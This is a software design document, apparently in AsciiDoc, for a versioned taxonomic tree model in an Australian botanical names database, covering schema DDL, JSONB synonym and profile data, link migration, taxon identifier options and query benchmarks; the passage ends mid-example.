Building new trees\n\nA new tree starts with an initial draft version which can be\n\n . a copy of an existing tree\n . entirely new, adding elements to the root of the tree\n . made up of copies of portions of other trees, by copying from a node down and placing that section under a node in\n the draft.\n\nOnce the initial draft is ready to be made \"public\" it is published as the first version.\n\n=== Tree paths\n\nThe current name tree path concept would be incorporated into the new tree_elements to provide a rapid way to display,\nsort, and search for items under (subtending) an element (currently called a node). 
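A sketch of that subtending lookup (assuming tree_path is a '/'-delimited path of element ids, as used by the queries
later in this document; the version id and path value are hypothetical):

[source]
.subtending.sql
----
-- everything under a given element in one version, in tree order;
-- '/9451389' stands for the tree_path of the element of interest
SELECT e.simple_name, e.depth
FROM tree_version_element tve
  JOIN tree_element e ON tve.tree_element_id = e.id
WHERE tve.tree_version_id = 152
  AND e.tree_path LIKE '/9451389%'
ORDER BY e.tree_path;
----
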
We can then remove name_tree_path as\nan additional maintenance cost.\n\n=== Immutable\n\nThe immutability of published versions (apart from typographical fixes, mainly in the names\/references) means that we can\nuse de-normalisation of data to increase efficiency in display and queries. For example, storing a precomposed display\nstring for the tree, name and rank information (see name_tree_paths rank path and name path). This also makes trees largely\nstand alone when it comes to queries.\n\n****\nFor example you could search *just the tree elements* for a name string % abru% in family\nFabaceae of rank species that are native to WA.\n****\n\nThis will greatly improve the speed and simplicity of searches, especially given the right indexes.\n\nSince links are also immutable they can also be stored to reduce round trips to the mapper.\n\n=== Synonyms\n\nTo further make trees autonomous we need to store the synonyms of the name in the tree element data. This can be achieved\nby storing a names string, similar to the name path, that contains all the synonyms of the name separated by a pipe.\n\n e.g.\n |Acacia mucronata subsp. mucronata|Acacia mucronata var. linearis|Acacia mucronata var. mucronata|Racosperma mucronatum subsp. mucronatum\n\nThis means you can do a search for a name on a tree including the synonyms by doing:\n\n select * from tree_element where names like '%|Acacia mucronata var. linearis%';\n\nNOTE: after implementing the names string and testing various queries the speed benefit of having the synonyms in this\nformat wasn't there and the use cases need the extra information. So I have removed the names string format and just left\nthe synonyms jsonb data. Greg W pointed out it might be worth splitting synonyms into synonyms and relationships.\nI have replaced that string with a synonyms_html string for displaying the nomenclatural, taxanomic and missapplications.\n\nA jsonb synonyms field stores more synonym data. To do a synonym search on a JSONB field and take advantage of gin\nindexing we need to carefully structure the JSON data around a common search. This probably means grouping the synonyms\ninto relationship types e.g.\n\n[source,javascript]\n.synonyms.json\n----\n{\n \"Isoetes drummondii var. anomala\" : {\n \"mis\" : false,\n \"nom\" : true,\n \"tax\" : false,\n \"type\" : \"nomenclatural synonym\",\n \"cites\" : \"Britton, D.M. & Brunton, D.F.(1991), < i > Fern Gazette < \/i> 14\",\n \"name_id\" : 205871,\n \"full_name_html\": \"<scientific><name id='205871'><scientific><name id='64421'><scientific><name id='64341'><element class='Isoetes'>Isoetes<\/ element > < \/name><\/ scientific > < element class = 'drummondii' > drummondii < \/element><\/ name > < \/scientific> <rank id='54412'>var.<\/ rank > < element class = 'anomala' > anomala < \/element> <authors><ex id='7577' title='Marsden, C.R.'>C.R.Marsden<\/ ex > ex < author id = '5138' title = 'Britton,D.M. & amp; Brunton ,D.F.'>D.M.Britton & D.F.Brunt.<\/author><\/authors><\/name><\/scientific>\"\n },\n \"Isoetes drummondii subsp. nov. (polyploid)\": {\n \"mis\" : false,\n \"nom\" : true,\n \"tax\" : false,\n \"type\" : \"nomenclatural synonym\",\n \"cites\" : \"Ross, J.H.in Ross, J.H.(ed.)(1993), < i > A Census of the Vascular Plants of Victoria < \/i> Edn. 
4\",\n \"name_id\" : 205964,\n \"full_name_html\": \"<scientific><name id='205964'><scientific><name id='64421'><scientific><name id='64341'><element class='Isoetes'>Isoetes<\/ element > < \/name><\/ scientific > < element class = 'drummondii' > drummondii < \/element><\/ name > < \/scientific> <rank id='54410'>subsp.<\/ rank > < element class = 'nov. (polyploid)' > nov.(polyploid) < \/element> <authors><author id='7781' title='Ross, J.H.'>J.H.Ross<\/ author > < \/authors><\/ name > < \/scientific>\"\n }\n}\n----\n\n=== Profile data \/ attributes\n\nThe Profile data will be stored as a JSON object\/document field in the tree_element. This allows arbitrary extension of the\nprofile data to be stored. It also provides a consistent versioned view of the Profile data. e.g.\n\n[source,javascript]\n.profile.json\n----\n{\n \"APC Dist.\" : {\n \"value\" : \"Tas\",\n \"source_id\" : 9928,\n \"created_at\" : \"2007-06-06T00:00:00+10:00\",\n \"created_by\" : \"APNI-NSL MIGRATION\",\n \"updated_at\" : \"2007-06-06T00:00:00+10:00\",\n \"updated_by\" : \"APNI-NSL MIGRATION\",\n \"source_system\": \"APC_CONCEPT\"\n },\n \"APC Comment\": {\n \"value\" : \"Previous references to this species on mainland Australia refer to I. muelleri (Chinnock, 1998).\",\n \"source_id\" : 9928,\n \"created_at\" : \"2007-06-06T00:00:00+10:00\",\n \"created_by\" : \"APNI-NSL MIGRATION\",\n \"updated_at\" : \"2007-06-06T00:00:00+10:00\",\n \"updated_by\" : \"APNI-NSL MIGRATION\",\n \"source_system\": \"APC_CONCEPT\"\n }\n}\n----\n\n\n\n==== Comments\n\nComments will be stored as a text comment field in the JSON profile data.\n\n==== Distribution\n\nDistribution data is currently just unstructured and unvalidated text. However a *lot* of the requests for information\nrely on the distribution data, and the correct interpretation of that data. Since distribution data is part of the\nprofile data requirement now is a good time to tackle this.\n\nTo this end we will make the distribution profile data a JSON object in the profile field containing pointers to\ndistribution data combinations. Distribution data combinations consist of a region and a set of flags in a legal\ncombination much the same way as name_status is set up. We use a JSON field because there is a variable number of regions\nthat can be assigned to a concept (tree_element) and we don't want to make outward pointing join tables to tree_elements.\n\nThis design helps keep trees stand alone, while linking back to distribution combinations and allowing the distribution\ndefinition to be extended, while providing the editor with a configurable set of valid profile combinations.\n\nThe Distribution field of the profile will contain a list of JSON object representations of the distribution combinations\nincluding the id of the combination for update purposes.\n\n=== Archiving\n\nThe data structure allows for archiving of versions by moving\/exporting a tree version. The structure keeps all the data\ncontained in the tree itself. Versions are immutable or read only, and self contained. 
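As a sketch, exporting a version could be as simple as copying its rows into an archive schema (the archive schema and
the version id here are hypothetical, not part of the model):

[source]
.archive-version.sql
----
-- copy one published version and the elements it uses out of the live tables
CREATE TABLE archive.tree_version_element_152 AS
  SELECT * FROM tree_version_element WHERE tree_version_id = 152;

CREATE TABLE archive.tree_element_152 AS
  SELECT e.*
  FROM tree_element e
  WHERE EXISTS (SELECT 1
                FROM tree_version_element tve
                WHERE tve.tree_element_id = e.id
                  AND tve.tree_version_id = 152);
----
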
Operations that need to interact\nwith the tree are limited to the workspaces\/drafts, and perhaps some advanced search operations on the current version.\n\nBy storing the Name, display string, Rank Path, and links on the tree, older versions can be displayed and queried without\nreferring to the rest of the NSL database, making it possible to have a service which can display the tree as it was from\narchived version in a different database.\n\nThis also means exporting a tree version provides 'all' the data needed to describe the tree.\n\n=== [.line-through]#Composite keys for tree_elements#\n\n\nNOTE: We have moved to a join table for the elements to tree versions so we don't need a composite key. A join table\ndoesn't reduce the advantages except for the identification of nodes to tree elements due to needing a unique tree_element\nid that is not related to node id.\n\nIt would be worth looking at using composite keys for tree_elements made up of the tree_version id and the tree_element id\nthat way we can copy the tree_elements and just change the version number.\n\nThe advantages of this are:\n\n . dramatically reduces the number of id's we have to generate out of the globally unique ID pool\n . intrinsically tracks nodes from one version to the next\n . simplifies the copy process a little\n . may help in diffing trees ( grab all the tree_elements with the same id across versions )\n . lets you very quickly find what an old version of a tree_element looks like now and ask questions like is this in\n the current version without any tree walks.\n\nDisadvantages are:\n\n . Looking up by id always requires the version\n . slightly trickier ORM mapping\n\nI think just advantage 1 outweighs the disadvantages because 100 x 35000 = 3,500,000 new IDs per year when the majority of\nthe data doesn't change. The rest of the advantages come down to speed and efficiency.\n\n=== Auditing\n\nA single updated by and updated at field is required in the tree_element since changes are versioned.\n\n== Transition\n\nWe will identify and replace the existing service endpoints for the Instance Editor to maintain functionality with the\nchange over. The tree editor functionality will need to be changed or incorporated into the Instance Editor. This work\nneeds to happen anyway.\n\n=== Existing history\n\nThere are currently:\n\n * 114k current APC nodes, including 35k taxon nodes and 79k value nodes.\n * 365k taxon nodes for any tree (including the APNI name tree)\n * 7M links.\n * 2995 versioned changes to the APC tree\n\nThe version changes date back to 2012-02-09 via the APC import. Greg Whitbread has suggested that we could discard all the\nhistorical changes up to a point, and considering no one would have relevant links that are currently supported.\n\nLooking in the mapper we only have mapped these older URI:\n\n * apni.name\/\n * apni.publication\/\n * apni.reference\/\n * apni.taxon\/\n\nNone of which refer to tree information, or nodes.\n\nWe currently map 63k node objects in the mapper across all trees, 48k nodes in apni (vascular shard).\n\nThere are 315k taxon nodes out of 365k (apni shard) that are _not_ in the mapper and therefore have never been referenced.\nThere are 67k APC taxon nodes out of 115k APC taxon nodes that are _not_ in the mapper and so haven't been referenced.\nThere are only 5 nodes in the current APC tree that are not in the mapper.\n\nHow much history should we keep? 
We can import from 2016 and delete history later.

=== option 1

Based on the above stats we should be able to work out which of the 2995 versions of the tree we currently have are in
the mapper and just replicate those versions to maintain the mapped links. Doable, but tricky.

*NOTE* It's possible that we have shared links to nodes that are _not_ in the mapper via the APC taxon exports. These
links are created in SQL, but may not have been created in the mapper because no one has referred to them via the services.
We could fix this by adding all nodes since the APC taxon exports started being used (with node links). There are 5 nodes
in the current APC tree that are not in the mapper.

=== option 2

Draw a line in the sand, then group changes. We can be sure that no links to the tree exist before the NSL was launched,
so we can ignore all versions before January 2015 (leaving us with 2643 versions). Then group versions into monthly
releases and point all node links in that month to the final version of the node for that month. This brings it down to
around 30 versions.

This somewhat breaks the contract that what was cited is what we get back; however the number of citations where the
changes incurred matter would, I guess, be approaching zero? I say that because, by and large, the changes per version are
for a single item, so while December 2015 saw 132 versions, each one was for a single name, e.g.

.version changes
|===
|note |time stamp

|update name 5416769|2015-12-23 09:34:44.212000 +11:00
|update name 81345|2015-12-23 09:33:52.836000 +11:00
|update name 5417736|2015-12-23 09:32:46.223000 +11:00
|update name 5419222|2015-12-23 09:31:40.348000 +11:00
|update name 80372|2015-12-23 09:29:25.683000 +11:00
|add name 80912 to name 80855|2015-12-23 08:49:16.608000 +11:00
|add name 80899 to name 80855|2015-12-23 08:48:29.840000 +11:00
|add name 80878 to name 80855|2015-12-23 08:47:15.710000 +11:00
|===

Take these changes adding excluded names to Correa pulchella J.B.Mackay ex Sweet, which is this node
https://biodiversity.org.au/nsl/services/node/apni/5424450 at 2015-12-23 08:49:16.608000 +11:00 but was a different
node 3 minutes earlier. The reality is that these changes were meant to be done as a batch and should only have been
published once.

==== option 2a

We could modify this option to group changes in a day to a single version, in which case I doubt anyone would notice.
This would not dramatically increase the number of versions saved, as tree work seems to be limited to a few days a month,
which comes out as a total of 206 versions from 2015-01-01.

=== Declared BTs

Declared BT tree_elements will be removed from history and, where we can, the excluded names attached to the BT will
be linked to the BT's parent directly. Most of the time this will mean the top of the tree. This will create a consistent
tree in the history.

=== Existing links

NOTE: A link to a node in the old structure only gives you the structure *below* it as it was when you took the link,
unless you took a link to a changed node further up the tree, or the top node. Although it is possible to find the
version of the tree you were looking at, it was *not* intrinsic in the link. The node identifier is effectively a taxon
concept identifier.

We can take existing published links and forward them to new links.
Due to history only being maintained in node links\nbelow that node we need node links to point to the latest version that has that node id.\n\nWith the change to using a join table we lose the node_id\/tree_element relationship, so we either need to store the\nnode id(s) in the tree_element or just use the mapper to map to the tree_element.\n\nThe most appropriate solution is to use the mapper to map node URI to tree_elements. They will resolve more appropriately\nto a _taxon identifier_.\n\n==== new links\n\nWe need to be able to encode the version into the tree links since tree_element uses a composite key.\n\nLinks currently are structured as ...\/object\/namespace\/number, e.g. node\/apni\/7845073, where the namespace so far\nhas been directly related to the shard. Trees are meant to be above\/separate to shards, so perhaps we should move to\nstoring the shard specifically in the identity structure in the mapper (it's more of a system identifier). This way\nwe can use the namespace as intended and have tree element links like:\n\n ...\/tree\/137\/7845073 i.e. effectively tree\/version\/element\n\nWARNING: The ID of tree_element should be _GLOBALLY UNIQUE_ so it *can* be copied from one tree to another on different\nsystems.\n\nthis lets us map any tree version to any shard\/uber service directly.\n\nThe mapper configuration handles the namespace to system mapping.\n\nThis URL scheme is useful for debugging.\n\nNOTE: Previously links were only created in the mapper when they were requested by the services - This was not intended\n to be the default way to make links, but... So when a workspace is created we do a bulk add of identifiers to\n the mapper. We need to add a bulk add api call on the mapper (done).\n\nThe mapper currently handles around 1.15 million identities without problem, and is designed to scale out via load\nbalancing if needed.\n\nNOTE: tree_elements store links to instance and name. The tree_version_element holds the \"element link\" to itself. The\nelement link is the primary key of the tree_version_element join table.\n\n==== taxon identifiers\n\nSince taxon identifiers exist in multiple versions of different trees (since they represent the taxon concept regardless\nof version) the question becomes how do you resolve a taxon concept? In the sense of this document it becomes clear that\na taxon concept is a fixed representation of the branch below a taxon, and the data contained within the circumscribed\ntaxa. So a taxon concept is fixed or immutable and exists outside of versions (so it may not be the current concept used)\nwhich means we can choose the concept from any version (by definition they are the same).\n\nWARNING: There are significant questions regarding use of taxon ID. Ideally the instance ID *is* the taxon ID\nbut the child taxa are not defined within an instance, they are described on a tree. If you change the sub taxa\nthe instance should change, but if you just haven't fully described the concept represented by the instance then the\ntaxon is the same. A taxon ID as described here represents what has been described in this tree so far, not what the\nconcept represents.\n\n.*_CONCLUSION_*\n\n****\nI have decided for the purposes of getting a working tree that is manageable that we should *not* track and create\ntaxon IDs as such. We can provide a comparison service end point (even a database function) to compare taxa in trees\nat a point. 
The user can compare Instance IDs as the definition of a Concept of a taxon, then compare two trees'
representations of that taxon and all its sub taxa. Just because the representation in a tree is slightly different,
the taxon they are *trying* to represent may be the same; they may just have made a mistake or not completed the task.

It can be left as a later exercise to create services that track taxa and validate their use, i.e. if someone re-uses
an instance in another tree, does it contain *only* the same taxa in the same order?
****

===== A circumscription hash

So we could resolve a taxon using something like:

http://id.biodiversity.org.au/taxon/80dd7fffd995817fe1a4d4494c519a0c1aa38803b394f69482ab5c794318e0a9

To generate the hash taxon identifier we use the [.line-through]#tree paths# instance paths of the parent and the
children within that version:

NOTE: We changed from the tree path to the instance path above because the tree element id changes on editing and it
becomes very tricky to track taxon changes, or element changes that have no net effect, e.g. moving a taxon to another
family and then moving it back. By using the instance id path we can use the query below to check if a taxon has changed,
because the instance should not have changed.

[source]
.circumscribe.sql
----
CREATE EXTENSION pgcrypto;

DROP FUNCTION IF EXISTS circumscribe( BIGINT, TEXT );
CREATE FUNCTION circumscribe(version_id BIGINT, path_match TEXT)
  RETURNS TEXT
LANGUAGE SQL
AS
$$
SELECT sha256_agg(paths)
FROM (
  SELECT e.instance_path AS paths
  FROM tree_version_element tve
    JOIN tree_element e ON tve.tree_element_id = e.id
  WHERE tve.tree_version_id = version_id
    AND e.instance_path LIKE path_match || '%'
  ORDER BY e.tree_path
  ) AS circumscription;
$$;
----
see <<A simple sha256_agg function>>

The circumscribe function above is a unique hash of all the children in order under a taxon (including that taxon). The
current worst case time for calculation of Plantae is ~2 seconds. When placing a new leaf taxon we need to take the
tree path of that taxon and recalculate the taxon identifier hash for all the tree_version_elements in that path. Given
about 11 levels, those calculations should take less than 22 seconds, and could be updated in the background.

We can drop the hash and use a simple array of instance ids for comparisons e.g.

[source]
.circumscribe.sql
----
DROP FUNCTION IF EXISTS circumscribe( BIGINT, TEXT );
CREATE FUNCTION circumscribe(version_id BIGINT, path_match TEXT)
  RETURNS BIGINT[]
LANGUAGE SQL
AS
$$
SELECT array_agg(paths)
FROM (
  SELECT e.instance_id paths
  FROM tree_version_element tve
    JOIN tree_element e ON tve.tree_element_id = e.id
  WHERE tve.tree_version_id = version_id
    AND e.instance_path LIKE path_match || '%'
  ORDER BY e.instance_path
) AS circumscription;
$$;
----

The difference in speed is around 300ms, which would be significant in bulk operations, and this provides real
data that can be used (instance ids).

===== More efficient method

All tree_elements have a hash of the tree_path. The tree_path (and the tree_element as a result) guarantees that the path
above matches the taxon, so we only need to include the children to show a difference. We also only need the leaf taxa in
the hash, because they contain the path of the entire branch to the top of the tree.

. Leaf tree_version_elements use the hash from the tree_element as taxon hash.
. Parent tree_version_elements concatenate immediate child taxon hashes and hash that.
. Go up one level and repeat.

When we add a taxon (leaf) we use the tree_element's hash as the new taxon hash, then follow the tree path up, regenerating
the taxon hash for each tree_version_element up the tree as above.

This method would be more efficient in production, but the initial generation is trickier with a reverse tree walk.

==== Even more efficient and pragmatic method

The hash methods have an elephant in the room: hashes. A hash can clash; hashes are good for cases where the data doesn't
exceed the number of different hashes. Sha256 has a lot of hashes and can represent billions of separate bits of data,
but we can't guarantee there won't be a clash. The best way to use a hash is to reduce the length of the data
represented by the hash. We can determine the uniqueness of a taxon (the circumscription of children and the taxon itself)
using the concatenation of the tree_paths of the leaf tree_elements. This effectively represents the tree; in fact it's just printing
out the tree ids in order (depth first) as a string. The above hash methods take that string and hash it. The string
contains a lot of repetition, but it is unique to this taxon... it *is* this taxon.

At last count we have 5.4 million tree_version_elements, 38 thousand tree_elements, and by the look of it around 40k
individual taxa. *It would be simpler to just assign an ID to a new taxon.* In fact, we already use the node ID to
identify the taxon, so we can just keep them as taxon identifiers and generate new ones when we add a taxon:

. Add (or Remove) a leaf element and assign the tree_version_element a new taxon ID
. use the tree_path to assign new taxon IDs to all the tree_version_elements up the branch
. profit.

===== cons?

If we do this every time a taxon is added to the tree in a draft, we will go through a lot of identifiers. We could check
to see if the identifier is new to this version and only change it once per version, but that is probably unnecessary
overhead...

Let's say we add 100 taxa in this version at forma level (about 10 levels down from Plantae), all under the same species;
then we'll use 1100 identifiers for 100 new taxa.

NOTE: the implementation includes a uniqueness check on taxon identifiers when assigning them within a draft version. This
does a count of tree_version_elements with the taxon identifier; if it returns just 1 then this is the only usage and it is
a draft, so it can be kept as the taxon identifier as it hasn't been published.

It doesn't intrinsically tell us if two taxa on different trees are the same. If you copy a taxon from one tree to another
we could use the same identifier, but if you create a copy of a taxon from parts, you would have a new identifier. We can
provide a service to compare taxa, but finding matching taxa across different trees would be relatively expensive (you
could use a tree comparison/diff to identify matches). Once you know two taxa are the same with different IDs you then
need to combine the identifiers somehow, perhaps in a matching service.

NOTE: We have added instance path to tree_elements to help us track/compare taxa. This is because the above method means
a new taxon identifier will be generated when you move a taxon somewhere else then move it back to where it was. There
is no way to check that it's actually the same taxon.
So we can use <<A circumscription hash>> on instance_path.\n\n=== RDF\n\nWe will need to map the new tree structure in joseki. There is a project called nsl-data, that is in the old git\nrepository. The nsl-data\/src\/apni.ttl file contains around 400 lines of mapping config (lines 2057 - 2457) which will\nneed to be reconfigured and deployed.\n\nCurrently the RDF services are apparently largely unused, so we should be able to re-map to a structure that makes\nsense.\n\n=== Uber trees\n\nThe new structure caters for uber trees by easily allowing trees to be copied and providing very fast mechanisms for\nsearch and display. Two million records is certainly not excessive to copy or refer to. It is not expected that people\nwill edit the uber tree directly so workspace versions would not normally be required.\n\nWe need to provide a mechanism to describe and build an uber tree that potentially watches the component trees to build\ncurrent uber tree.\n\nTwo million record tree would be expected to take up around 285MB based on the estimated data usage figures quoted above\nfor 35k names.\n\ndoing a select on 4 819 443 tree_elements and ordering by name_path on my local machine took 3m 12s\n\n select * from tree_element order by name_path;\n 2000 rows retrieved starting from 1 in 3m 12s 448ms (execution: 3m 11s 788ms, fetching: 660ms)\n\nafter optimising postgresql this came down to 1m 40s.\n\nWith a trigram index on name_path a search for everything under Eucalyptus on 4.8M tree_elements (159213 results 2000 fetched)\ntakes ~5 seconds.\n\n sql> select * from tree_element where name_path like '%\/Eucalyptus\/%' order by name_path\n [2017-06-26 17:02:47] 2000 rows retrieved starting from 1 in 4s 910ms (execution: 4s 579ms, fetching: 331ms)\n\nOn about 2M elements it takes 2.2s indicating the time taken for these queries is linear with number of records.\n\n sql> select * from tree_element where tree_version_id > 80 and name_path like '%\/Eucalyptus\/%' order by name_path\n [2017-06-26 17:07:46] 2000 rows retrieved starting from 1 in 2s 271ms (execution: 2s 35ms, fetching: 236ms)\n\nThis also indicates more machine grunt may improve performance. (After optimising postgresql this came down to 1.48s)\n\n****\nMy local machine is an i7-4820K 3.70GHz CPU x 4, 32GB machine with a 500GB Samsung SSD. Postgresql had not been optimised\nfor this machine yet.\n****\n\nCopying 2 million tree_elements into a new table takes around 9.6s\n\n sql> select * into new_tree_elements from tree_element where tree_version_id > 80\n [2017-06-26 17:37:30] completed in 9s 618ms\n\n\nGiven it takes about 12 seconds to copy\/insert 35k tree_elements into the tree_elements table to make a workspace\nit should take around 11 minutes to copy an entire 2 million element tree. 
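That estimate is simply the measured copy time scaled linearly:

 2,000,000 / 35,000 ~ 57 batches of 35k elements
 57 x 12 s ~ 685 s, i.e. around 11.4 minutes
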
We shouldn't have to copy the entire uber\ntree of this size very often.\n\n== What it looks like\n\nimage::new-tree-overview.svg[]\n\n== The model\n\n[source]\n.DDL.sql\n----\nDROP TABLE IF EXISTS tree;\nCREATE TABLE tree (\n id INT8 DEFAULT nextval('nsl_global_seq') NOT NULL,\n lock_version INT8 DEFAULT 0 NOT NULL,\n current_tree_version_id INT8,\n default_draft_tree_version_id INT8,\n group_name TEXT NOT NULL,\n name TEXT NOT NULL,\n reference_id INT8,\n PRIMARY KEY (id)\n);\n\nDROP TABLE IF EXISTS tree_version;\nCREATE TABLE tree_version (\n id INT8 DEFAULT nextval('nsl_global_seq') NOT NULL,\n lock_version INT8 DEFAULT 0 NOT NULL,\n draft_name TEXT NOT NULL,\n log_entry TEXT,\n previous_version_id INT8,\n published BOOLEAN DEFAULT FALSE NOT NULL,\n published_at TIMESTAMP WITH TIME ZONE,\n published_by VARCHAR(100),\n tree_id INT8 NOT NULL,\n PRIMARY KEY (id)\n);\n\nDROP TABLE IF EXISTS tree_element;\nCREATE TABLE tree_element (\n id INT8 DEFAULT nextval('nsl_global_seq') NOT NULL,\n lock_version INT8 DEFAULT 0 NOT NULL,\n depth INT4 NOT NULL,\n display_html TEXT NOT NULL,\n excluded BOOLEAN DEFAULT FALSE NOT NULL,\n instance_id INT8 NOT NULL,\n instance_link TEXT NOT NULL,\n name_element VARCHAR(255) NOT NULL,\n name_id INT8 NOT NULL,\n name_link TEXT NOT NULL,\n name_path TEXT NOT NULL,\n parent_element_id INT8,\n previous_element_id INT8,\n profile JSONB,\n rank VARCHAR(50) NOT NULL,\n rank_path JSONB,\n simple_name TEXT NOT NULL,\n source_element_link TEXT,\n source_shard TEXT NOT NULL,\n synonyms JSONB,\n synonyms_html TEXT NOT NULL,\n tree_path TEXT NOT NULL,\n updated_at TIMESTAMP WITH TIME ZONE NOT NULL,\n updated_by VARCHAR(255) NOT NULL,\n PRIMARY KEY (id)\n);\n\nDROP TABLE IF EXISTS tree_version_element;\nCREATE TABLE tree_version_element (\n element_link TEXT NOT NULL,\n taxon_id INT8 NOT NULL,\n taxon_link TEXT NOT NULL,\n tree_element_id INT8 NOT NULL,\n tree_version_id INT8 NOT NULL,\n PRIMARY KEY (element_link)\n);\n\n----\n\nRefer to code at https:\/\/github.com\/bio-org-au\/nsl-domain-plugin\/blob\/new-tree\/web-app\/sql\/update-to-24.sql\n\n== User impact of change over\n\nCurrently in production:\n\n * a taxon can be added or removed from a tree.\n * the status of the taxon can be changed from accepted to excluded.\n * the comment and distribution values on the tree can be updated, but are not used as instance notes are used instead.\n\nSynonymy does not affect the tree structure as such, as that is related to the concepts that are placed on the tree only.\nThere is no current process to determine if changes to synonymy of taxon concepts (instances) affect the tree, in terms\nof the rules governing placements.\n\nPlacement rules are currently poorly implemented and incomplete.\n\nIn the change over the initial goal will be to replace the existing functionality. We should be able to do this without\nmajor impact or change.\n\n== Amount of work\n\nThere main functional areas affected by this change:\n\n . Search\n . Display\n . Editing\n\nWe would also need to factor out NameTreePath as it is replaced by the new TreeElement and the APNI name tree.\n\nI'm guestimating the amount of work to be around 340 hours in total, which depending on other work could be completed\nin 8 weeks.\n\n=== APNI Name Tree\n\nNow would be the right time to replace the APNI name tree if we're going to do that. JIRA NSL-2304 discusses the issues\naround the name tree being replaced. 
There is definitely a current need for a tree structure that caters for names that
aren't in the APC/taxonomic tree.

The solution suggested in NSL-2304 is to replace Name.sortName with a tree path as per the tree_element and existing
name_tree_path, and to put the "agreed" family of a name in the name where that name is below family. Name id path
would be a logical addition to speed up any other name path operations, but we may say
https://en.wikipedia.org/wiki/You_aren%27t_gonna_need_it[YAGNI] on this initially.

To do this we would, in order:

. copy the APC name path to all names in APC
. copy the APC name path to all synonyms of names on the tree
. follow name.parent up the tree for names not in APC until we reach a name in APC to build their path.

In the last step we can stop once we hit a name with a name path, which makes this more of a functional step.

This still means editors should put the immediate parent of a name in, not the "Name parent", as we're still using the
name tree as a filler for what isn't in APC.

=== Search and display

==== Services

In the current services we use a search including the tree_nodes to determine if a name is on a tree and where it is
ranked on that tree. We also look to see if a name is in APC to display an APC tick. This has been generalised somewhat
to allow different "accepted" trees.

We need to refactor:

|===
|work| notes| effort
| search and APC/APNIFormat outputs.| -| 20h
| tree path code to use the tree_element | will mostly be deleting code that keeps up with tree_node changes| 20h
| The APNI name tree needs to be replaced | just use the name parent, and make sure Family comes from the accepted
tree only. Extra time allowed for implementation discussion.|40h
| tree services API | most of it is deleted.| 40h
| Tree object representation| -|20h
| flat view taxon and name exports | rework the view| 10h
| test infrastructure and tests| -| 30h
|| -|180h
|===

Obviously the existing tree structure is used extensively in the services for the "tree services", but most of that will
just go and be replaced with a much simpler set of code.
The search service and APNI\/APC format out put are the only\nother places that use them along with name_tree_path.\n\n===== Objects representation in HTML\/JSON\n\nCurrently the tree nodes are modeled with and output object which in html looks like\nhttps:\/\/biodiversity.org.au\/nsl\/services\/node\/apni\/9159708\n\nThe JSON version exposes too much of the tree infrastructure by using terminology like \"subnodes\", links and some random\nRDF stuff.\n\nhttps:\/\/biodiversity.org.au\/nsl\/services\/node\/apni\/9159708.json\n\nMost of the following snippet is useless to anyone consuming the data.\n\n[source,javascript]\n.node_snippet.js\n----\n{\n \"class\": \"au.org.biodiversity.nsl.Link\",\n \"typeUri\": {\n \"idPart\": \"btOf\",\n \"nsPart\": \"apc-voc\",\n \"uri\": \"http:\/\/biodiversity.org.au\/voc\/apc\/APC#btOf\",\n \"uriEncoded\": \"http%3A%2F%2Fbiodiversity.org.au%2Fvoc%2Fapc%2FAPC%23btOf\",\n \"qname\": \"apc-voc:btOf\",\n \"css\": \"apc-voc bt-of\"\n },\n \"subNode\": {\n \"class\": \"au.org.biodiversity.nsl.Node\",\n \"_links\": {\n \"permalink\": {\n \"link\": \"https:\/\/id.biodiversity.org.au\/node\/apni\/9159707\",\n \"preferred\": true,\n \"resources\": 1\n }\n },\n \"id\": 9159707,\n \"type\": \"T\",\n \"typeUri\": {\n \"idPart\": \"ApcConcept\",\n \"nsPart\": \"apc-voc\",\n \"uri\": \"http:\/\/biodiversity.org.au\/voc\/apc\/APC#ApcConcept\",\n \"uriEncoded\": \"http%3A%2F%2Fbiodiversity.org.au%2Fvoc%2Fapc%2FAPC%23ApcConcept\",\n \"qname\": \"apc-voc:ApcConcept\",\n \"css\": \"apc-voc apc-concept\"\n }\n },\n \"linkSeq\": 1,\n \"versioningMethod\": {\n \"enumType\": \"au.org.biodiversity.nsl.VersioningMethod\",\n \"name\": \"V\"\n },\n \"isSynthetic\": true\n},\n\n----\n\nWe'll replace the html page with something very similar for now and completely restructure the JSON output to better\nrepresent the taxon in the context of the tree.\n\ne.g.\n\n[source,javascript]\n.treeElement.js\n----\n{\n\n \"treeElement\": {\n \"class\": \"au.org.biodiversity.nsl.TreeElement\",\n \"_links\": {\n \"elementLink\": \"http:\/\/test-id-vasc.biodiversity.org.au\/tree\/9476777\/9479620\",\n \"taxonLink\": \"http:\/\/test-id-vasc.biodiversity.org.au\/node\/apni\/2908938\",\n \"parentElementLink\": \"http:\/\/test-id-vasc.biodiversity.org.au\/tree\/9476777\/9479431\",\n \"nameLink\": \"http:\/\/test-id-vasc.biodiversity.org.au\/name\/apni\/54576\",\n \"instanceLink\": \"http:\/\/test-id-vasc.biodiversity.org.au\/instance\/apni\/650575\",\n \"sourceElementLink\": null\n },\n \"tree\": {\n \"class\": \"au.org.biodiversity.nsl.Tree\",\n \"_links\": {\n \"permalinks\": [\n {\n \"link\": \"https:\/\/test-id-vasc.biodiversity.org.au\/tree\/apni\/APC\",\n \"preferred\": true,\n \"resources\": 1\n }\n ]\n },\n \"audit\": null,\n \"name\": \"APC\"\n },\n \"simpleName\": \"Juncaginaceae\",\n \"rankPath\": {\n \"Ordo\": {\n \"id\": 214965.0,\n \"name\": \"Alismatales\",\n \"name_link\": \"http:\/\/test-id-vasc.biodiversity.org.au\/name\/apni\/214965\"\n },\n \"Regnum\": {\n \"id\": 54717.0,\n \"name\": \"Plantae\",\n \"name_link\": \"http:\/\/test-id-vasc.biodiversity.org.au\/name\/apni\/54717\"\n },\n \"Classis\": {\n \"id\": 223519.0,\n \"name\": \"Equisetopsida\",\n \"name_link\": \"http:\/\/test-id-vasc.biodiversity.org.au\/name\/apni\/223519\"\n },\n \"Familia\": {\n \"id\": 54576.0,\n \"name\": \"Juncaginaceae\",\n \"name_link\": \"http:\/\/test-id-vasc.biodiversity.org.au\/name\/apni\/54576\"\n },\n \"Division\": {\n \"id\": 224706.0,\n \"name\": \"Charophyta\",\n \"name_link\": 
